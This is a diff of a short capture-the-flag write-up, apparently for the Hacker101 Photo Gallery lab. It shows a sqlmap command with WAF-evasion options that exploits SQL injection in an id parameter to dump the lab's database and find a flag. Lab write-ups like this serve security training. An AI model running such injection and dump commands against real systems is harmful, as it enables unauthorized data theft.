ivenk/hacker101/photogallery.md

 ...num_of_tables : 2
 ...tables_names : albums, photos

 For the extraction of the data i used sqlmap.
-I dumped the entire database using the following commands:
+I dumped the entire database using the following command:
 ```
-sqlmap -u ".../fetch?id=2" --method GET --dump -D level5 -T photos -p id --code 200 --skip-waf --random-agent --threads 10 -o
+sqlmap -u ".../fetch?id=2" --method GET --dump -D level5 -p id --code 200 --skip-waf --random-agent --threads 10 -o
 ```

 You will find flag 1 in the entry for the invisible kitty.